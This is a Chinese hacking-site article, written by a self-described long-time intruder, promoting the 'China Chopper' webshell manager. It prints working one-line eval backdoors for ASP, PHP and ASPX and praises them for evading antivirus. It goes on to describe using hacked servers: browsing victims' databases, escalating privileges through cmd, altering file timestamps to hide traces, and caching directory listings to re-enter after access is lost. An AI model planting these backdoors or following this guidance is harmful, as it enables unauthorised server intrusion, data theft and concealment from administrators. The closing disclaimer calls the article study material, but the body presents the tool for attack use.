我是一个玩黑很多年的人，入侵了大大小小的服务器无数，体验着入侵快感的同时，自己的技术和经验也不断提高，在渗透过程中收集了大大小小的工具一堆，都快把自己的U盘放满了，当然，随着时代和技术的进步，很多工具也相应的过时了，但是却很少去删掉，看着那些熟悉的图标，熟悉的界面，就好象看到了自己一步步成长的过程，这其中有很多是自己的作品，看着那些逐渐从丑陋过渡到简陋再过渡到精美的软件界面，呵呵，这其中的滋味，真的很感慨。

由于脚本是我自己的弱项，于是这些年收集了很多脚本后门，比如早期的站长管理助手，海洋顶端系列，砍客一句话后门，虫虫催化剂后门，还有angel的phpspy等等系列，数不胜数，当然还有后期的一堆美化版，加强版，超级加强版。算起来，娇娘asp后门美化版，是我所知的第一个流传较广的美化修改版，后来逐渐被更新的海洋顶端网替代了，渐渐淡出人们的视野，以上种种，asp,aspx,php,jsp,cfm,php,甚至wap协议通用的脚本后门，箩箩筐筐在黑吧安全网收集了一大堆，都快有10M大小了。这其中有一堆脚本是另一堆脚本的子集，而不是交集，还有不少是有后门的，不过我也懒得去分辨和筛选了，毕竟这些东东能让我用到的时候不多，常用的还是那几个脚本，比如ASP环境用这个，PHP环境用那个,JSP环境用那个，除非某些比较特别的功能，是这个常用的脚本后门里面没有的，我才去找那些不常用的脚本后门来临时代替一下，这些弄起来很烦，所以我一直在寻找着一款真正合心意的脚本后门，终于........，我发现了一个远超我想象的脚本后门-------中国菜刀。

说起菜刀，就不得不提起菜刀的作者，作者是一个退伍军人，生长在一个贫穷的农村，据说初中也没读完，英语更是不咋地，但他却自学掌握了

C++/J2ME/PHP/JSP/ASP.NET(C#,VB,C++,delphi,J#)/ASP/MySQL/MsSQL/Oracle/Informix/PostgreSQL/DB2/Sybase/Access/UNIX/LINUX/WIN/SEO/Flash(AS)/PhotoShop/Freehand

等等，当初在六七年前台湾闹独立的时候，他在国民党和民进党的网站上留下了“只有一个中国”的黑页，一举成名。

作者是一个朴实，低调的技术牛人，他这些年留下的作品很多，中国菜刀是他最新的一个作品，从他之前的作品WEBSHELL管理器的基础上修改而来，功能更加的强大。

你见过很强大的ASP后门，很强大的PHP后门，很强大的ASPX后门，那你见过很强大的asp,aspx,php三合一后门么........，没有吧，尤其是这个后门，只有一句话。

Asp环境：<%eval request("a")%>

Php环境：<?php @eval($_POST['a']);?>

Aspx环境：<% @page Language="Jscript"><%eval(Request.item["a"],"unsafe");%>

是不是很震憾，很不可思议，是的，我刚接触的时候，也是这样的想法，就这三句话，一个名不见经传的“中国菜刀”，就可以代替我那搜集了几年，大大小小几百个多种平台多种环境的脚本后门？，事实证明，我错了，原来“中国菜刀”不仅仅可以代替那些后门，而且他的功能超出我的想象，就让我慢慢说明吧。

1.就从最基本的讲起，你的脚本是不是经常被杀，你怎么变形都被杀，，传到服务器被杀导致被管理员发现，结果你的权限就没了，杀到你欲哭无泪。菜刀的一句话后门，可以避免这个问题，只有短短的一行代码，永远不会被查杀。

2.你是不是很郁闷你的后门传到服务器上连他妈都不认识了，框架变形，字体变框框，点击菜单无效，这个是因为系统语言不兼容造成的，菜刀是UINCODE方式编译,支持多国语言输入显示,完全不存在兼容性问题。

3.你是不是有很多webshell，你每次都拿记事本记下来，需要的时候，又去翻半天，弄得你很累很没脾气。有了“菜刀”，你可以很方便管理你的webshell，所有的记录都保存在加密的本地数据库里，而且支持webshell分类，让你管理得井井有条。菜刀不仅有临时锁定功能，方便你离开电脑的那小会时间不被别人偷你的webshell，也有加密功能，不输对密码，HOHO，偷了你的数据也没用。

4.再来说说数据库管理，这个是菜刀最最强大的功能，精通各平台主流数据库的作者，把这个功能写的是淋漓尽致。支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS等等数据库，支持不是最主要的，功能强大，人性化才是最主要的，“菜刀”的数据库操作界面，内置了常用的数据库语句，非常直观的表列名浏览功能，自动显示表名，列名，查询语句，非常人性化的设计，更内置了不少自建的函数，方便不懂数据库的菜鸟，都能查阅数据库里的数据，再说个“菜刀”数据库管理的一个小技巧，对于access数据库，可以在菜刀的webshell操作界面，对着MDB文件点右键，点Access Management，就直接进入Access的数据库操作界面了，方便吧，嘿嘿！！

5.再说说提权这块，webshell的提权总是最让人关心的，说到提权，就不能说到webshell上的cmd执行了，有些朋友并不了解菜刀的自定义CMD路径功能，有两种方法可以设置指定的cmd路径，一就是在cmd操作界面，输入setp d:\cmd.exe，就可以了，或者把cmd.exe上传到目录，然后点右键,点virtual terminal file，就可以进入自定义CMD.EXE路径的命令行了，同样的，再给个cmd使用的小技巧，在菜刀的命令行里，可以使用cd等命令跳转目录，方便吧，嘿嘿！！嗯，另外，新版菜刀新增常用目录管理功能，你可以把你常用的目录或者提权的目录加进菜刀里，这样很方便你提权或者日常工作，是不是比那些固定了提权目录的脚本后门要牛B的多啊，哈哈。

6.还有菜刀的webshell上的文件功能功能，也是非常人性化的，文件夹和文件的图标完全模枋windows,，文件日期，文件大小，文件权限，一目了然，尤其是修改文件时间功能，非常的方便，直接对着要修改时间的文件点右键,modify the file time，然后在文件的时间那栏，输入时间，回车，就修改完了。当然，菜刀的文件管理还有新建，删除，上传，下载，编辑功能，这些大同小异，就不一一细说了。不过有个功能，还是要重点说明的，那就是目录缓存功能，菜刀可以把浏览过的webshell目录都缓存在本地，这样可以方便下次访问的时候更加快捷，最重要的是，当哪天你的权限丢了，起码你还有对方服务器的文件目录结构，方便再一次渗透。

[1][2]下一页

【声明】:黑吧安全网(http://http://www.zjjv.com//)登载此文出于传递更多信息之目的，并不代表本站赞同其观点和对其真实性负责，仅适于网络安全技术爱好者学习研究使用，学习中请遵循国家相关法律法规。如有问题请联系我们，联系邮箱admin@myhack58.com，我们会在最短的时间内进行处理。